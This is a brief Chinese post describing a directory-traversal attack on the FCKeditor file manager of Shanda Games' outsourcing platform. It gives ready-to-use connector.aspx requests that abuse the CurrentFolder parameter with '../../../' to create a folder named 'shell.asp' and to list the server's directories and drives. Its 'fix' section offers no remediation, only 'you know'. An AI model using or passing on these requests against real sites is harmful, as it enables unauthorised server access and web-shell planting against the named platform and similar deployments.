盛大游戏外包管理平台FCK列全盘目路分析与解决方案
摘要:修改CurrentFolder参数使用../../来进入不同的目录/browser/default/connectors/aspx/conn...
修改CurrentFolder 参数使用../../来进入不同的目录
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../../&NewFolderName=shell.asp
根据返回的XML 信息可以查看网站所有的目录。
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
也可以直接浏览盘符:
修复方案:
你懂的!
【盛大游戏外包管理平台FCK列全盘目路分析与解决方案】相关文章:
★ php escapeshellcmd多字节编码漏洞解析及延伸
★ BusinessObjects RptViewerAX ActiveX栈溢出漏洞
★ Adobe Photoshop Album Starter Edition BMP图形头处理缓冲区溢出漏洞
★ Ewebeditor2.8.0最终版删除任意文件漏洞分析与解决方法
★ BBSXP论坛程序New.asp页面过滤不严导致SQL注入漏洞
★ PHP-Nuke 4nChat错误验证roomid参数 SQL注入漏洞